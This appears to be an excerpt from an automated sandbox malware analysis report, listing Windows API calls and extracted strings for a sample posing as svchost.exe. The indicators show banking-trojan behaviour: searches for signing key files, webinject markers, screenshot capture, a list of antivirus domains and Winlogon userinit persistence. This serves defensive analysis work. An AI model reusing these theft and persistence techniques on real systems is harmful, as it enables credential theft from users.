                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$trendsecure$virusinfo$virustotal$z-oleg.com
                                                                                                                                                                                                                • API String ID: 0-375433535
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000000,?,?,7702DB30), ref: 00403060
                                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00403080
                                                                                                                                                                                                                • CoCreateInstance.OLE32(00404418,00000000,00000001,00404208,?), ref: 004030A7
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004030BF
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004030DA
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004030F8
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00403116
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0040319C
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004031A2
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004031A8
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004031AE
                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(004036D6), ref: 004031ED
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00404F4C), ref: 00403396
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004033BB
                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004033D9
                                                                                                                                                                                                                  • Part of subcall function 00402F70: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004031C1,00404F38), ref: 00402F78
                                                                                                                                                                                                                  • Part of subcall function 00402F70: HeapAlloc.KERNEL32(00000000,?,004031C1,00404F38), ref: 00402F7F
                                                                                                                                                                                                                  • Part of subcall function 00402F70: SysAllocString.OLEAUT32(004031C1), ref: 00402FA0
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00403486
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 0040348C
                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00403492
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
                                                                                                                                                                                                                • String ID: cmd.exe$p=5w
                                                                                                                                                                                                                • API String ID: 2839743307-760121691
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,02BB148C,00000000,?), ref: 02BB101B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000013,7556F570,?,02BB148C,00000000,?), ref: 02BB103E
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02BB148C,00000000,?), ref: 02BB1045
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB1055
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,7556F570,?,02BB148C,00000000,?), ref: 02BB1073
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,name.key,00000000,?,02BB148C,00000000,?), ref: 02BB1093
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD0810,00000000,00000000,00000000), ref: 02BB10B9
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,\secrets.key,?,02BB148C,00000000,?), ref: 02BB10D5
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD20D0,00000000,00000000,00000000), ref: 02BB10E5
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,sign.key,?,02BB148C,00000000,?), ref: 02BB10FD
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD2BB0,00000000,00000000,00000000), ref: 02BB1116
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?,?,02BB148C,00000000,?), ref: 02BB112A
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,02BB148C,00000000,?), ref: 02BB113B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02BB148C,00000000,?), ref: 02BB1150
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02BB148C,00000000,?), ref: 02BB1153
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02BB148C,00000000,?), ref: 02BB115F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02BB148C,00000000,?), ref: 02BB1162
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$CreateProcessThread$ByteCharHandleMultiWide$AllocCloseFreeInformationValidatememset
                                                                                                                                                                                                                • String ID: \secrets.key$name.key$sign.key
                                                                                                                                                                                                                • API String ID: 3254303593-2345338882
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02BBDF80: GetDesktopWindow.USER32 ref: 02BBDF8E
                                                                                                                                                                                                                  • Part of subcall function 02BBDF80: RealChildWindowFromPoint.USER32(00000000,?,02BBE016,?,02BBA857,?,755730D0,?), ref: 02BBDF95
                                                                                                                                                                                                                  • Part of subcall function 02BBDF80: IsWindowVisible.USER32(00000000), ref: 02BBDFC1
                                                                                                                                                                                                                  • Part of subcall function 02BBDF80: GetParent.USER32(00000000), ref: 02BBDFC8
                                                                                                                                                                                                                  • Part of subcall function 02BBDF80: GetWindowLongA.USER32(00000000,000000EC), ref: 02BBDFD3
                                                                                                                                                                                                                  • Part of subcall function 02BBDF80: WindowFromPoint.USER32(755730D0,?,?,02BBE016,?,02BBA857,?,755730D0,?), ref: 02BBDFE8
                                                                                                                                                                                                                • RealChildWindowFromPoint.USER32(00000000,?,02BBA857,?,02BBA857,?,755730D0,?), ref: 02BBE037
                                                                                                                                                                                                                • SendMessageTimeoutA.USER32(00000000,00000084,00000000,02BBA857,00000002,00000064,?), ref: 02BBE05D
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBE081
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBE092
                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02BBE09D
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBE0BB
                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02BBE0C6
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02BBA857), ref: 02BBE0D2
                                                                                                                                                                                                                • GetAncestor.USER32(00000000,00000002), ref: 02BBE0E6
                                                                                                                                                                                                                • GetWindowInfo.USER32(?,?), ref: 02BBE129
                                                                                                                                                                                                                • PtInRect.USER32(?,?,02BBA857), ref: 02BBE154
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBE174
                                                                                                                                                                                                                • SendMessageTimeoutA.USER32(00000000,00000084,00000000,02BBA857,00000002,00000064,000000FF), ref: 02BBE1A3
                                                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,00000000,00000001), ref: 02BBE1D0
                                                                                                                                                                                                                • RealChildWindowFromPoint.USER32(?,00000000,?), ref: 02BBE1DB
                                                                                                                                                                                                                • MapWindowPoints.USER32(?,00000000,00000000,00000001), ref: 02BBE1F7
                                                                                                                                                                                                                • RealChildWindowFromPoint.USER32(00000000,00000000,?), ref: 02BBE202
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Long$FromPoint$ChildReal$MessagePointsSendTimeout$AncestorDesktopInfoMutexObjectParentRectReleaseSingleVisibleWait
                                                                                                                                                                                                                • String ID: <$P0Wu
                                                                                                                                                                                                                • API String ID: 1846550538-3435678627
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D70E0,?,76C0BF00), ref: 02BD10F0
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,76C0BF00), ref: 02BD1131
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,76C0BF00), ref: 02BD113B
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD1143
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD1154
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,76C0BF00), ref: 02BD115B
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,76C0BF00), ref: 02BD119A
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,?,76C0BF00), ref: 02BD11A7
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,76C0BF00), ref: 02BD11F0
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,76C0BF00), ref: 02BD120C
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,?,00000104,?,76C0BF00), ref: 02BD1229
                                                                                                                                                                                                                  • Part of subcall function 02BD9780: GetProcessHeap.KERNEL32(00000008,00004070,75570F00,00000000,75572F00,?,02BC3CE8,?), ref: 02BD9793
                                                                                                                                                                                                                  • Part of subcall function 02BD9780: RtlAllocateHeap.NTDLL(00000000,?,02BC3CE8,?), ref: 02BD9796
                                                                                                                                                                                                                  • Part of subcall function 02BD9780: memset.MSVCRT ref: 02BD97AB
                                                                                                                                                                                                                  • Part of subcall function 02BD9780: CreateFileA.KERNEL32(02BC3CE8,40000000,00000003,00000000,00000002,00000080,00000000,?,02BC3CE8,?), ref: 02BD9802
                                                                                                                                                                                                                  • Part of subcall function 02BD9780: GetProcessHeap.KERNEL32(00000000,00000000,?,02BC3CE8,?), ref: 02BD9825
                                                                                                                                                                                                                  • Part of subcall function 02BD9780: HeapValidate.KERNEL32(00000000,?,02BC3CE8,?), ref: 02BD9828
                                                                                                                                                                                                                  • Part of subcall function 02BD9780: GetProcessHeap.KERNEL32(00000000,00000000,?,02BC3CE8,?), ref: 02BD9834
                                                                                                                                                                                                                  • Part of subcall function 02BD9780: HeapFree.KERNEL32(00000000,?,02BC3CE8,?), ref: 02BD9837
                                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,76C0BF00), ref: 02BD1258
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D70E0,?,76C0BF00), ref: 02BD1277
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000,?,76C0BF00), ref: 02BD12DB
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?,?,76C0BF00), ref: 02BD12E8
                                                                                                                                                                                                                  • Part of subcall function 02BD9910: LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,75572F00), ref: 02BD9991
                                                                                                                                                                                                                  • Part of subcall function 02BD9910: _snprintf.MSVCRT ref: 02BD99AD
                                                                                                                                                                                                                  • Part of subcall function 02BD9910: FindFirstFileA.KERNEL32(00000000,?), ref: 02BD99BC
                                                                                                                                                                                                                  • Part of subcall function 02BD9910: LocalFree.KERNEL32(00000000), ref: 02BD99C9
                                                                                                                                                                                                                  • Part of subcall function 02BD9910: wsprintfA.USER32 ref: 02BD9A08
                                                                                                                                                                                                                  • Part of subcall function 02BD9910: wsprintfA.USER32 ref: 02BD9A16
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileHeap$FreePathProcess$AllocAttributesBackslashCreateDirectoryErrorLastLocalVirtualwsprintf$AdminAllocateCurrentDeleteFindFirstFolderMakeModuleNameSystemUserValidate_snprintflstrcpynmemset
                                                                                                                                                                                                                • String ID: 617D70E0$\$inter.zip$path.txt
                                                                                                                                                                                                                • API String ID: 3271220685-2935460956
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7752,?,?,00000000), ref: 02BD2920
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000), ref: 02BD2961
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 02BD296B
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD2973
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD2984
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 02BD298B
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 02BD29BF
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,?,?,00000000), ref: 02BD29CC
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,?,00000000), ref: 02BD2A10
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,?,00000000), ref: 02BD2A2C
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 02BD2A49
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DirectoryErrorFileLastPath$AdminAllocAttributesBackslashCreateCurrentFolderMakeModuleNameSystemUserVirtuallstrcpyn
                                                                                                                                                                                                                • String ID: 617D7752$\$path.txt$rfk.zip
                                                                                                                                                                                                                • API String ID: 3351314726-451692846
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(02BFFB20,00000000,00000000,00000000,?,02BC1A39), ref: 02BC1330
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000020,?,02BC1A39), ref: 02BC1398
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02BC1A39), ref: 02BC139F
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BC141F
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BC1439
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BC1453
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BC146D
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BC1497
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000020), ref: 02BC14B4
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC14BB
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BC15E4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC161C
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC161F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC162C
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC162F
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02BFFB20,?,02BC1A39), ref: 02BC163A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$strstr$Process$AllocCriticalSection$EnterFreeLeaveValidate
                                                                                                                                                                                                                • String ID: data_after$data_before$data_end$data_inject$set_url
                                                                                                                                                                                                                • API String ID: 2387113551-2328515424
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D098), ref: 02BD3920
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD3961
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD396B
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD3973
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD3984
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD398B
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02BD39BF
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 02BD39CC
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02BD3A10
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02BD3A2C
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02BD3A49
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DirectoryErrorFileLastPath$AdminAllocAttributesBackslashCreateCurrentFolderMakeModuleNameSystemUserVirtuallstrcpyn
                                                                                                                                                                                                                • String ID: \$path.txt$stf.zip
                                                                                                                                                                                                                • API String ID: 3351314726-487659054
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BCB1F0
                                                                                                                                                                                                                  • Part of subcall function 02BCB110: PathAddBackslashA.SHLWAPI(617D73CA), ref: 02BCB137
                                                                                                                                                                                                                  • Part of subcall function 02BCB110: GetFileAttributesA.KERNEL32(?), ref: 02BCB175
                                                                                                                                                                                                                  • Part of subcall function 02BCB110: PathFileExistsA.SHLWAPI(?), ref: 02BCB1B9
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73CA), ref: 02BCB238
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BCB2A0
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BCB2AD
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73CA,?,?), ref: 02BCB2E7
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02BCB36A
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02BCB37E
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02BCB391
                                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000), ref: 02BCB3C0
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73CA), ref: 02BCB3CB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCB3EE
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BCB3F1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCB3FE
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BCB401
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$BackslashFileHeap$AttributesFreeProcessVirtual$AllocCurrentDeleteDirectoryExistsValidatelstrcpynmemset
                                                                                                                                                                                                                • String ID: 5NT$617D73CA$keys.zip$path.txt
                                                                                                                                                                                                                • API String ID: 2685098104-302677734
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                                • memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401264
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000), ref: 00401275
                                                                                                                                                                                                                • IsBadWritePtr.KERNEL32(?,00000004), ref: 00401285
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileHeap$Process$Handle$AllocCloseCreateFreeInformationLockPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                                • String ID: G,@
                                                                                                                                                                                                                • API String ID: 132362422-3313068137
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7280), ref: 02BCF2F7
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCF33B
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCF347
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCF34B
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCF35C
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCF363
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(?), ref: 02BCF390
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCF39F
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BCF3A5
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BCF3A9
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCF3BA
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BCF3C1
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BCF3EF
                                                                                                                                                                                                                • Sleep.KERNEL32(00000FA0,?), ref: 02BCF405
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
                                                                                                                                                                                                                • String ID: %s\%02d.bmp$617D7280$scrs
                                                                                                                                                                                                                • API String ID: 1455050916-804494941
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe,755730D0,00000000), ref: 02BD4A43
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?,75690180), ref: 02BD4A6D
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 02BD4A8D
                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 02BD4ABA
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02BD4ABE
                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,00000000,00000002), ref: 02BD4B60
                                                                                                                                                                                                                  • Part of subcall function 02BC41B0: GetProcessHeap.KERNEL32(00000000,00000000,6F8890B0,02BC0C69), ref: 02BC41BE
